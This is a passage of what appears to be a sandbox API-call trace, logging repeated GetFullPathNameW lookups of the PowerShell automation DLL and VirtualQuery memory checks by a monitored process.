	[0317.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.766] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.766] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.767] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.767] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.767] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.768] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.768] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.769] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.769] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.770] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.770] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.771] VirtualQuery (in: lpAddress=0x28aff0, lpBuffer=0x28beb0, dwLength=0x30 | out: lpBuffer=0x28beb0*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.771] VirtualQuery (in: lpAddress=0x28b080, lpBuffer=0x28bf40, dwLength=0x30 | out: lpBuffer=0x28bf40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.773] VirtualQuery (in: lpAddress=0x28ba90, lpBuffer=0x28c950, dwLength=0x30 | out: lpBuffer=0x28c950*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
